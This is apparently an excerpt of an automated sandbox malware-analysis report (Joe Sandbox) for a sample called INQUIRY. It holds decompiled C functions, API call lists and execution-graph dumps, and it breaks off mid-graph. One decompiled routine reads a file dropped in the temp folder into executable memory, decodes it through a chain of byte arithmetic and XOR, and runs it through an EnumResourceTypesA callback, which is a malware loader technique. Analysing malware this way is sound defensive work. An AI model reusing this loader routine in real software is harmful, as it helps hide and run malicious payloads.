                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: CharPrevlstrlen
                          • String ID: C:\Users\user\Desktop
                          • API String ID: 2709904686-224404859
                          • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                          • Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
                          • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                          • Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004056D1(CHAR* _a4, CHAR* _a8) {
                          				int _t10;
                          				int _t15;
                          				CHAR* _t16;
                          
                          				_t15 = lstrlenA(_a8);
                          				_t16 = _a4;
                          				while(lstrlenA(_t16) >= _t15) {
                          					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                          					_t10 = lstrcmpiA(_t16, _a8);
                          					if(_t10 == 0) {
                          						return _t16;
                          					}
                          					_t16 = CharNextA(_t16);
                          				}
                          				return 0;
                          			}






                          0x004056dd
                          0x004056df
                          0x00405707
                          0x004056ec
                          0x004056f1
                          0x004056fc
                          0x00000000
                          0x00405719
                          0x00405705
                          0x00405705
                          0x00000000

                          APIs
                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                          • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
                          • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004056FF
                          • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: lstrlen$CharNextlstrcmpi
                          • String ID:
                          • API String ID: 190613189-0
                          • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                          • Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
                          • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                          • Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Execution Graph

                          Execution Coverage:29%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:12
                          Total number of Limit Nodes:2

                          Callgraph

                          Control-flow Graph

                          C-Code - Quality: 97%
                          			E6FB01070(void* __ebx) {
                          				long _v8;
                          				void* _v12;
                          				long _v16;
                          				void* _v20;
                          				short _v22;
                          				short _v24;
                          				short _v26;
                          				short _v28;
                          				short _v30;
                          				short _v32;
                          				short _v34;
                          				short _v36;
                          				short _v38;
                          				char _v40;
                          				long _v44;
                          				short _v1084;
                          				void* _t97;
                          				void* _t100;
                          				signed int _t104;
                          				void* _t106;
                          				void* _t137;
                          				_Unknown_base(*)()* _t149;
                          				long _t187;
                          
                          				_t137 = __ebx;
                          				_push(__ebx);
                          				_v40 = 0x74;
                          				_v38 = 0x61;
                          				_v36 = 0x75;
                          				_v34 = 0x64;
                          				_v32 = 0x6f;
                          				_v30 = 0x73;
                          				_v28 = 0x77;
                          				_v26 = 0x79;
                          				_v24 = 0x6f;
                          				_v22 = 0;
                          				GetTempPathW(0x103,  &_v1084);
                          				E6FB01000( &_v1084,  &_v40);
                          				_t97 = CreateFileW( &_v1084, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                          				_v20 = _t97;
                          				_v16 = GetFileSize(_v20, 0);
                          				_t100 = VirtualAlloc(0, _v16, 0x3000, 0x40); // executed
                          				_v12 = _t100;
                          				_t187 = _v16;
                          				ReadFile(_v20, _v12, _t187,  &_v44, 0); // executed
                          				_v8 = 0;
                          				while(_v8 < _v16) {
                          					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) + 0x35;
                          					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0xac;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x00000072;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x00000090;
                          					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0x21;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                          					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0xaf;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x000000e5;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x000000cb;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x00000061;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                          					_t187 = _v8 + 1;
                          					_v8 = _t187;
                          				}
                          				_t149 = _v12;
                          				_t104 = EnumResourceTypesA(0, _t149, 0); // executed
                          				_t106 = (_t104 ^ 0x0000620a) + 0x16054;
                          				if(_t137 + 0xb33a != 0x12f4f) {
                          					_t106 = _t106 + 0x17ef8;
                          					_t187 = _t187 - 1;
                          					_t149 = _t149 + 1;
                          				}
                          				return _t106;
                          			}


























                          0x6fb01070
                          0x6fb01079
                          0x6fb0107f
                          0x6fb01088
                          0x6fb01091
                          0x6fb0109a
                          0x6fb010a3
                          0x6fb010ac
                          0x6fb010b5
                          0x6fb010be
                          0x6fb010c7
                          0x6fb010cd
                          0x6fb010dd
                          0x6fb010ee
                          0x6fb0110f
                          0x6fb01115
                          0x6fb01124
                          0x6fb01134
                          0x6fb0113a
                          0x6fb01143
                          0x6fb0114f
                          0x6fb01155
                          0x6fb01167
                          0x6fb01185
                          0x6fb0119c
                          0x6fb011b0
                          0x6fb011c7
                          0x6fb011db
                          0x6fb011ee
                          0x6fb01201
                          0x6fb01218
                          0x6fb0122b
                          0x6fb01242
                          0x6fb01255
                          0x6fb01268
                          0x6fb0127f
                          0x6fb01293
                          0x6fb012a6
                          0x6fb01161
                          0x6fb01164
                          0x6fb01164
                          0x6fb012af
                          0x6fb012b5
                          0x6fb012c0
                          0x6fb012d1
                          0x6fb012d3
                          0x6fb012d8
                          0x6fb012d9
                          0x6fb012d9
                          0x6fb012fb

                          APIs
                          • GetTempPathW.KERNEL32(00000103,?), ref: 6FB010DD
                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6FB0110F
                          • GetFileSize.KERNEL32(?,00000000), ref: 6FB0111E
                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 6FB01134
                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 6FB0114F
                          • EnumResourceTypesA.KERNEL32(00000000,?,00000000), ref: 6FB012B5
                          Memory Dump Source
                          • Source File: 00000003.00000002.705492818.000000006FB01000.00000020.00020000.sdmp, Offset: 6FB00000, based on PE: true
                          • Associated: 00000003.00000002.705476299.000000006FB00000.00000002.00020000.sdmpDownload File
                          • Associated: 00000003.00000002.705537373.000000006FB05000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6fb00000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: File$AllocCreateEnumPathReadResourceSizeTempTypesVirtual
                          • String ID:
                          • API String ID: 3718768629-0
                          • Opcode ID: e3acfcb4fbd8feea85c32b344638b706da53ada9cf242642384d84454a2c7a55
                          • Instruction ID: c194f60ffb892a93773c8828d363a94d87e43af6a857df35c224e2755621a843
                          • Opcode Fuzzy Hash: e3acfcb4fbd8feea85c32b344638b706da53ada9cf242642384d84454a2c7a55
                          • Instruction Fuzzy Hash: 9E912035904188EFDB05CBA8C991BEDBFB1EF5A308F1840D8D541AB392C6766F54DB24
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Execution Graph

                          Execution Coverage:13.3%
                          Dynamic/Decrypted Code Coverage:1.1%
                          Signature Coverage:1.6%
                          Total number of Nodes:1529
                          Total number of Limit Nodes:11
                          execution_graph 10534 401640 10535 401656 _com_error::_com_error 10534->10535 10554 402233 10535->10554 10537 401664 _com_raise_error 10557 40372d 10537->10557 10539 401678 _com_raise_error 10564 4019be 10539->10564 10541 401701 10542 401c88 ___scrt_fastfail 4 API calls 10541->10542 10544 401708 ___scrt_initialize_default_local_stdio_options 10542->10544 10543 40168d __RTC_Initialize 10543->10541 10569 401b5f 10543->10569 10546 4016a6 _com_raise_error 10546->10541 10547 4016b7 10546->10547 10572 401c1a InitializeSListHead 10547->10572 10549 4016bc _com_raise_error __except_handler4 10573 401c26 10549->10573 10551 4016df _com_raise_error 10579 4037c7 10551->10579 10553 4016ea _com_raise_error 10556 402253 10554->10556 10555 402285 RaiseException 10555->10537 10556->10555 10558 40373c 10557->10558 10559 40375f 10557->10559 10558->10559 10560 404831 __dosmaperr 20 API calls 10558->10560 10559->10539 10561 40374f 10560->10561 10562 404639 _abort 26 API calls 10561->10562 10563 40375a 10562->10563 10563->10539 10565 4019cc 10564->10565 10568 4019d1 ___scrt_initialize_onexit_tables ___scrt_release_startup_lock 10564->10568 10566 401c88 ___scrt_fastfail 4 API calls 10565->10566 10565->10568 10567 401a54 10566->10567 10568->10543 10586 401b24 10569->10586 10572->10549 10652 403d63 10573->10652 10575 401c37 10576 401c3e 10575->10576 10577 401c88 ___scrt_fastfail 4 API calls 10575->10577 10576->10551 10578 401c46 10577->10578 10580 404320 _abort 38 API calls 10579->10580 10581 4037d2 10580->10581 10582 404831 __dosmaperr 20 API calls 10581->10582 10585 40380a 10581->10585 10583 4037ff 10582->10583 10584 404639 _abort 26 API calls 10583->10584 10584->10585 10585->10553 10587 401b41 10586->10587 10588 401b48 10586->10588 10592 403bb7 10587->10592 10595 403c27 10588->10595 10591 401b46 10591->10546 10593 403c27 __onexit 29 API calls 10592->10593 10594 403bc9 10593->10594 10594->10591 10598 40392e 10595->10598 10601 403864 10598->10601 10600 403952 10600->10591 10602 403870 ___scrt_is_nonwritable_in_current_image 10601->10602 10609 405656 EnterCriticalSection 10602->10609 10604 40387e 10610 403a76 10604->10610 10606 40388b 10620 4038a9 10606->10620 10608 40389c ___scrt_is_nonwritable_in_current_image 10608->10600 10609->10604 10611 403a94 10610->10611 10618 403a8c _com_raise_error __crt_fast_encode_pointer 10610->10618 10612 403aed 10611->10612 10611->10618 10623 406786 10611->10623 10613 406786 __onexit 29 API calls 10612->10613 10612->10618 10616 403b03 10613->10616 10615 403ae3 10617 403e03 __freea 20 API calls 10615->10617 10619 403e03 __freea 20 API calls 10616->10619 10617->10612 10618->10606 10619->10618 10651 40569e LeaveCriticalSection 10620->10651 10622 4038b3 10622->10608 10624 406791 10623->10624 10625 4067b9 10624->10625 10626 4067aa 10624->10626 10629 4067c8 10625->10629 10632 407c1f 10625->10632 10627 404831 __dosmaperr 20 API calls 10626->10627 10631 4067af ___scrt_get_show_window_mode 10627->10631 10639 407c52 10629->10639 10631->10615 10633 407c2a 10632->10633 10634 407c3f HeapSize 10632->10634 10635 404831 __dosmaperr 20 API calls 10633->10635 10634->10629 10636 407c2f 10635->10636 10637 404639 _abort 26 API calls 10636->10637 10638 407c3a 10637->10638 10638->10629 10640 407c6a 10639->10640 10641 407c5f 10639->10641 10643 407c72 10640->10643 10649 407c7b _abort 10640->10649 10642 403e3d __onexit 21 API calls 10641->10642 10647 407c67 10642->10647 10644 403e03 __freea 20 API calls 10643->10644 10644->10647 10645 407c80 10648 404831 __dosmaperr 20 API calls 10645->10648 10646 407ca5 HeapReAlloc 10646->10647 10646->10649 10647->10631 10648->10647 10649->10645 10649->10646 10650 4068fd _abort 7 API calls 10649->10650 10650->10649 10651->10622 10653 403d81 _com_raise_error 10652->10653 10657 403da1 _com_raise_error 10652->10657 10654 404831 __dosmaperr 20 API calls 10653->10654 10655 403d97 10654->10655 10656 404639 _abort 26 API calls 10655->10656 10656->10657 10657->10575 11137 4078c0 11140 405243 11137->11140 11141 40524c 11140->11141 11142 405255 11140->11142 11143 405142 51 API calls 11141->11143 11143->11142 10658 405244 10659 405255 10658->10659 10661 405142 10658->10661 10662 404320 _abort 38 API calls 10661->10662 10663 40514f 10662->10663 10681 405261 10663->10681 10665 405157 10690 404ed6 10665->10690 10668 403e3d __onexit 21 API calls 10669 40517f 10668->10669 10670 4051b1 10669->10670 10697 405303 10669->10697 10672 403e03 __freea 20 API calls 10670->10672 10674 40516e 10672->10674 10674->10659 10675 4051ac 10676 404831 __dosmaperr 20 API calls 10675->10676 10676->10670 10677 4051f5 10677->10670 10707 404dac 10677->10707 10678 4051c9 10678->10677 10679 403e03 __freea 20 API calls 10678->10679 10679->10677 10682 40526d ___scrt_is_nonwritable_in_current_image 10681->10682 10683 404320 _abort 38 API calls 10682->10683 10684 405277 10683->10684 10687 403e8b _abort 38 API calls 10684->10687 10688 4052fb ___scrt_is_nonwritable_in_current_image 10684->10688 10689 403e03 __freea 20 API calls 10684->10689 10710 405656 EnterCriticalSection 10684->10710 10711 4052f2 10684->10711 10687->10684 10688->10665 10689->10684 10715 403f2b 10690->10715 10693 404ef7 GetOEMCP 10695 404f20 10693->10695 10694 404f09 10694->10695 10696 404f0e GetACP 10694->10696 10695->10668 10695->10674 10696->10695 10698 404ed6 40 API calls 10697->10698 10699 405322 10698->10699 10702 405373 IsValidCodePage 10699->10702 10704 405329 10699->10704 10706 405398 ___scrt_get_show_window_mode 10699->10706 10700 4018cc _ValidateLocalCookies 5 API calls 10701 4051a4 10700->10701 10701->10675 10701->10678 10703 405385 GetCPInfo 10702->10703 10702->10704 10703->10704 10703->10706 10704->10700 10752 404fae GetCPInfo 10706->10752 10825 404d69 10707->10825 10709 404dd0 10709->10670 10710->10684 10714 40569e LeaveCriticalSection 10711->10714 10713 4052f9 10713->10684 10714->10713 10716 403f48 10715->10716 10717 403f3e 10715->10717 10716->10717 10718 404320 _abort 38 API calls 10716->10718 10717->10693 10717->10694 10719 403f69 10718->10719 10723 40723c 10719->10723 10724 403f82 10723->10724 10725 40724f 10723->10725 10727 407269 10724->10727 10725->10724 10731 4066bf 10725->10731 10728 40727c 10727->10728 10730 407291 10727->10730 10729 405261 __fassign 38 API calls 10728->10729 10728->10730 10729->10730 10730->10717 10732 4066cb ___scrt_is_nonwritable_in_current_image 10731->10732 10733 404320 _abort 38 API calls 10732->10733 10734 4066d4 10733->10734 10742 406722 ___scrt_is_nonwritable_in_current_image 10734->10742 10743 405656 EnterCriticalSection 10734->10743 10736 4066f2 10744 406736 10736->10744 10741 403e8b _abort 38 API calls 10741->10742 10742->10724 10743->10736 10745 406706 10744->10745 10746 406744 __fassign 10744->10746 10748 406725 10745->10748 10746->10745 10747 406472 __fassign 20 API calls 10746->10747 10747->10745 10751 40569e LeaveCriticalSection 10748->10751 10750 406719 10750->10741 10750->10742 10751->10750 10753 405092 10752->10753 10759 404fe8 10752->10759 10756 4018cc _ValidateLocalCookies 5 API calls 10753->10756 10758 40513e 10756->10758 10758->10704 10762 4062b8 10759->10762 10761 407aec 43 API calls 10761->10753 10763 403f2b __fassign 38 API calls 10762->10763 10765 4062d8 MultiByteToWideChar 10763->10765 10766 406316 10765->10766 10767 4063ae 10765->10767 10769 403e3d __onexit 21 API calls 10766->10769 10772 406337 __alloca_probe_16 ___scrt_get_show_window_mode 10766->10772 10768 4018cc _ValidateLocalCookies 5 API calls 10767->10768 10770 405049 10768->10770 10769->10772 10776 407aec 10770->10776 10771 4063a8 10781 4063d5 10771->10781 10772->10771 10774 40637c MultiByteToWideChar 10772->10774 10774->10771 10775 406398 GetStringTypeW 10774->10775 10775->10771 10777 403f2b __fassign 38 API calls 10776->10777 10778 407aff 10777->10778 10785 4078cf 10778->10785 10782 4063e1 10781->10782 10783 4063f2 10781->10783 10782->10783 10784 403e03 __freea 20 API calls 10782->10784 10783->10767 10784->10783 10787 4078ea 10785->10787 10786 407910 MultiByteToWideChar 10788 407ac4 10786->10788 10789 40793a 10786->10789 10787->10786 10790 4018cc _ValidateLocalCookies 5 API calls 10788->10790 10793 403e3d __onexit 21 API calls 10789->10793 10795 40795b __alloca_probe_16 10789->10795 10791 40506a 10790->10791 10791->10761 10792 4079a4 MultiByteToWideChar 10794 4079bd 10792->10794 10807 407a10 10792->10807 10793->10795 10812 405989 10794->10812 10795->10792 10795->10807 10797 4063d5 __freea 20 API calls 10797->10788 10799 4079e7 10804 405989 11 API calls 10799->10804 10799->10807 10800 407a1f 10801 407a40 __alloca_probe_16 10800->10801 10802 403e3d __onexit 21 API calls 10800->10802 10803 407ab5 10801->10803 10806 405989 11 API calls 10801->10806 10802->10801 10805 4063d5 __freea 20 API calls 10803->10805 10804->10807 10805->10807 10808 407a94 10806->10808 10807->10797 10808->10803 10809 407aa3 WideCharToMultiByte 10808->10809 10809->10803 10810 407ae3 10809->10810 10811 4063d5 __freea 20 API calls 10810->10811 10811->10807 10813 4056b5 _abort 5 API calls 10812->10813 10814 4059b0 10813->10814 10817 4059b9 10814->10817 10820 405a11 10814->10820 10818 4018cc _ValidateLocalCookies 5 API calls 10817->10818 10819 405a0b 10818->10819 10819->10799 10819->10800 10819->10807 10821 4056b5 _abort 5 API calls 10820->10821 10822 405a38 10821->10822 10823 4018cc _ValidateLocalCookies 5 API calls 10822->10823 10824 4059f9 LCMapStringW 10823->10824 10824->10817 10826 404d75 ___scrt_is_nonwritable_in_current_image 10825->10826 10833 405656 EnterCriticalSection 10826->10833 10828 404d7f 10834 404dd4 10828->10834 10832 404d98 ___scrt_is_nonwritable_in_current_image 10832->10709 10833->10828 10846 4054f4 10834->10846 10836 404e22 10837 4054f4 26 API calls 10836->10837 10838 404e3e 10837->10838 10839 4054f4 26 API calls 10838->10839 10840 404e5c 10839->10840 10841 404d8c 10840->10841 10842 403e03 __freea 20 API calls 10840->10842 10843 404da0 10841->10843 10842->10841 10860 40569e LeaveCriticalSection 10843->10860 10845 404daa 10845->10832 10847 405505 10846->10847 10851 405501 10846->10851 10848 40550c 10847->10848 10853 40551f ___scrt_get_show_window_mode 10847->10853 10849 404831 __dosmaperr 20 API calls 10848->10849 10850 405511 10849->10850 10852 404639 _abort 26 API calls 10850->10852 10851->10836 10852->10851 10853->10851 10854 405556 10853->10854 10855 40554d 10853->10855 10854->10851 10857 404831 __dosmaperr 20 API calls 10854->10857 10856 404831 __dosmaperr 20 API calls 10855->10856 10858 405552 10856->10858 10857->10858 10859 404639 _abort 26 API calls 10858->10859 10859->10851 10860->10845 11299 405f44 11300 405f50 ___scrt_is_nonwritable_in_current_image 11299->11300 11311 405656 EnterCriticalSection 11300->11311 11302 405f57 11312 405bff 11302->11312 11304 405f66 11305 405f75 11304->11305 11325 405dd8 GetStartupInfoW 11304->11325 11336 405f91 11305->11336 11309 405f86 ___scrt_is_nonwritable_in_current_image 11311->11302 11313 405c0b ___scrt_is_nonwritable_in_current_image 11312->11313 11314 405c18 11313->11314 11315 405c2f 11313->11315 11316 404831 __dosmaperr 20 API calls 11314->11316 11339 405656 EnterCriticalSection 11315->11339 11318 405c1d 11316->11318 11319 404639 _abort 26 API calls 11318->11319 11321 405c27 ___scrt_is_nonwritable_in_current_image 11319->11321 11320 405c67 11347 405c8e 11320->11347 11321->11304 11322 405c3b 11322->11320 11340 405b50 11322->11340 11326 405df5 11325->11326 11328 405e87 11325->11328 11327 405bff 27 API calls 11326->11327 11326->11328 11329 405e1e 11327->11329 11331 405e8e 11328->11331 11329->11328 11330 405e4c GetFileType 11329->11330 11330->11329 11332 405e95 11331->11332 11333 405ed8 GetStdHandle 11332->11333 11334 405f40 11332->11334 11335 405eeb GetFileType 11332->11335 11333->11332 11334->11305 11335->11332 11351 40569e LeaveCriticalSection 11336->11351 11338 405f98 11338->11309 11339->11322 11341 403ece _abort 20 API calls 11340->11341 11342 405b62 11341->11342 11344 405927 11 API calls 11342->11344 11346 405b6f 11342->11346 11343 403e03 __freea 20 API calls 11345 405bc1 11343->11345 11344->11342 11345->11322 11346->11343 11350 40569e LeaveCriticalSection 11347->11350 11349 405c95 11349->11321 11350->11349 11351->11338 10861 401848 10864 402c47 10861->10864 10865 4043a4 _abort 20 API calls 10864->10865 10868 402c5e 10865->10868 10866 4018cc _ValidateLocalCookies 5 API calls 10867 401859 10866->10867 10868->10866 11144 403cc8 11145 403ceb 11144->11145 11146 403cd7 11144->11146 11147 403e03 __freea 20 API calls 11145->11147 11146->11145 11149 403e03 __freea 20 API calls 11146->11149 11148 403cfd 11147->11148 11150 403e03 __freea 20 API calls 11148->11150 11149->11145 11151 403d10 11150->11151 11152 403e03 __freea 20 API calls 11151->11152 11153 403d21 11152->11153 11154 403e03 __freea 20 API calls 11153->11154 11155 403d32 11154->11155 11156 409cd3 11157 409ce9 11156->11157 11158 409cdd 11156->11158 11158->11157 11159 409ce2 CloseHandle 11158->11159 11159->11157 11160 4096d5 11162 4096fd 11160->11162 11161 409735 11162->11161 11163 409727 11162->11163 11164 40972e 11162->11164 11169 4097a7 11163->11169 11173 409790 11164->11173 11170 4097b0 11169->11170 11177 409e7f 11170->11177 11174 4097b0 11173->11174 11175 409e7f __startOneArgErrorHandling 21 API calls 11174->11175 11176 409733 11175->11176 11179 409ebe __startOneArgErrorHandling 11177->11179 11183 409f40 __startOneArgErrorHandling 11179->11183 11187 40a282 11179->11187 11180 409f6a 11181 40a596 __startOneArgErrorHandling 20 API calls 11180->11181 11182 409f76 11180->11182 11181->11182 11184 4018cc _ValidateLocalCookies 5 API calls 11182->11184 11183->11180 11185 402e1b __startOneArgErrorHandling 5 API calls 11183->11185 11186 40972c 11184->11186 11185->11180 11188 40a2a5 __raise_exc RaiseException 11187->11188 11189 40a2a0 11188->11189 11189->11183 11356 408f56 IsProcessorFeaturePresent 11396 4035d7 11397 403dc2 40 API calls 11396->11397 11398 4035df 11397->11398 10869 40185c 10870 401dd9 _abort GetModuleHandleW 10869->10870 10871 401864 10870->10871 10872 401870 10871->10872 10873 4036c9 _abort 28 API calls 10871->10873 10875 40187b ___scrt_is_nonwritable_in_current_image 10872->10875 10876 4036ab 10872->10876 10873->10872 10877 4034d8 _abort 28 API calls 10876->10877 10878 4036b6 10877->10878 10878->10875 10879 40485c 10880 40487c 10879->10880 10883 404892 10879->10883 10881 404831 __dosmaperr 20 API calls 10880->10881 10882 404881 10881->10882 10885 404639 _abort 26 API calls 10882->10885 10886 404907 10883->10886 10892 404a00 10883->10892 10899 404a29 10883->10899 10894 40488b 10885->10894 10908 40311e 10886->10908 10888 40497e 10891 403e03 __freea 20 API calls 10888->10891 10889 4018cc _ValidateLocalCookies 5 API calls 10890 404a18 10889->10890 10891->10892 10914 404c7d 10892->10914 10894->10889 10895 404975 10895->10888 10896 404a1c 10895->10896 10897 404649 _abort 11 API calls 10896->10897 10898 404a28 10897->10898 10900 404a39 10899->10900 10900->10900 10901 403ece _abort 20 API calls 10900->10901 10902 404a6b 10901->10902 10903 404649 _abort 11 API calls 10902->10903 10904 404ac6 ___scrt_get_show_window_mode 10903->10904 10905 404b88 FindFirstFileExW 10904->10905 10906 404bd7 10905->10906 10907 404a29 26 API calls 10906->10907 10909 403133 10908->10909 10910 40312f 10908->10910 10909->10910 10911 403ece _abort 20 API calls 10909->10911 10910->10895 10912 403161 10911->10912 10913 403e03 __freea 20 API calls 10912->10913 10913->10910 10918 404c87 10914->10918 10915 404c97 10917 403e03 __freea 20 API calls 10915->10917 10916 403e03 __freea 20 API calls 10916->10918 10919 404c9e 10917->10919 10918->10915 10918->10916 10919->10894 11190 4074e0 11191 407519 11190->11191 11192 40751d 11191->11192 11203 407545 11191->11203 11193 404831 __dosmaperr 20 API calls 11192->11193 11195 407522 11193->11195 11194 407869 11196 4018cc _ValidateLocalCookies 5 API calls 11194->11196 11197 404639 _abort 26 API calls 11195->11197 11198 407876 11196->11198 11199 40752d 11197->11199 11200 4018cc _ValidateLocalCookies 5 API calls 11199->11200 11201 407539 11200->11201 11203->11194 11204 407400 11203->11204 11205 40741b 11204->11205 11206 4018cc _ValidateLocalCookies 5 API calls 11205->11206 11207 407492 11206->11207 11207->11203 11208 4046e0 11212 4046f1 11208->11212 11209 4046f5 11210 404831 __dosmaperr 20 API calls 11209->11210 11211 4046fa 11209->11211 11213 404725 11210->11213 11212->11209 11212->11211 11215 404736 11212->11215 11214 404639 _abort 26 API calls 11213->11214 11214->11211 11215->11211 11216 404831 __dosmaperr 20 API calls 11215->11216 11216->11213 11399 403dee 11400 403df1 11399->11400 11401 403e8b _abort 38 API calls 11400->11401 11402 403dfd 11401->11402 11403 403e0e HeapFree 11402->11403 11407 403e37 __dosmaperr 11402->11407 11404 403e23 11403->11404 11403->11407 11405 404831 __dosmaperr 20 API calls 11404->11405 11406 403e29 GetLastError 11405->11406 11406->11407 11357 40276f 11358 402786 11357->11358 11359 402779 11357->11359 11359->11358 11360 403e03 __freea 20 API calls 11359->11360 11360->11358 11217 4022f0 11228 4022b0 11217->11228 11229 4022c2 11228->11229 11230 4022cf 11228->11230 11231 4018cc _ValidateLocalCookies 5 API calls 11229->11231 11231->11230 11361 408f70 11364 408f8e 11361->11364 11363 408f86 11366 408f93 11364->11366 11365 4097e3 21 API calls 11367 4091bf 11365->11367 11366->11365 11368 409028 11366->11368 11367->11363 11368->11363 11232 408af1 11233 408b11 11232->11233 11236 408b48 11233->11236 11235 408b3b 11237 408b4f 11236->11237 11238 408bb0 11237->11238 11242 408b6f 11237->11242 11239 4097a7 21 API calls 11238->11239 11240 40969e 11238->11240 11241 408bfe 11239->11241 11240->11235 11241->11235 11242->11240 11243 4097a7 21 API calls 11242->11243 11244 4096ce 11243->11244 11244->11235 11369 405575 GetCommandLineA GetCommandLineW 11370 403775 11371 403781 ___scrt_is_nonwritable_in_current_image 11370->11371 11373 4037b8 ___scrt_is_nonwritable_in_current_image 11371->11373 11378 405656 EnterCriticalSection 11371->11378 11374 403795 11375 406736 __fassign 20 API calls 11374->11375 11376 4037a5 11375->11376 11379 4037be 11376->11379 11378->11374 11382 40569e LeaveCriticalSection 11379->11382 11381 4037c5 11381->11373 11382->11381 10920 402e79 10921 402ea4 GetModuleFileNameW 10920->10921 10922 402e88 10920->10922 10926 402eca 10921->10926 10922->10921 10923 402e8e 10922->10923 10924 404831 __dosmaperr 20 API calls 10923->10924 10925 402e93 10924->10925 10927 404639 _abort 26 API calls 10925->10927 10928 40311e 20 API calls 10926->10928 10930 402e9d 10927->10930 10929 402ef4 10928->10929 10931 402efd 10929->10931 10934 402f09 10929->10934 10932 404831 __dosmaperr 20 API calls 10931->10932 10936 402f02 10932->10936 10933 403e03 __freea 20 API calls 10933->10930 10934->10934 10935 403e03 __freea 20 API calls 10934->10935 10934->10936 10935->10936 10936->10933 10937 403c7a 10940 4033a2 10937->10940 10949 4032fb 10940->10949 10943 4032fb 5 API calls 10944 4033c0 10943->10944 10945 4032cc 20 API calls 10944->10945 10946 4033cb 10945->10946 10947 4032cc 20 API calls 10946->10947 10948 4033d6 10947->10948 10950 403314 10949->10950 10951 4018cc _ValidateLocalCookies 5 API calls 10950->10951 10952 403335 10951->10952 10952->10943 11412 4099fb 11413 409a14 __startOneArgErrorHandling 11412->11413 11414 409a3d __startOneArgErrorHandling 11413->11414 11415 409fd4 21 API calls 11413->11415 11415->11414 11416 4067fe GetProcessHeap 10479 40317f 10488 4055c5 GetEnvironmentStringsW 10479->10488 10483 403e03 __freea 20 API calls 10484 4031cc 10483->10484 10485 4031a2 10486 403e03 __freea 20 API calls 10485->10486 10487 403197 10486->10487 10487->10483 10489 403191 10488->10489 10490 4055d9 10488->10490 10489->10487 10495 4031d2 10489->10495 10512 403e3d 10490->10512 10492 4055ed 10493 403e03 __freea 20 API calls 10492->10493 10494 405607 FreeEnvironmentStringsW 10493->10494 10494->10489 10497 4031f0 10495->10497 10496 403ece _abort 20 API calls 10502 40322a 10496->10502 10497->10496 10497->10497 10498 40329b 10499 403e03 __freea 20 API calls 10498->10499 10500 4032b5 10499->10500 10500->10485 10501 403ece _abort 20 API calls 10501->10502 10502->10498 10502->10501 10503 40329d 10502->10503 10507 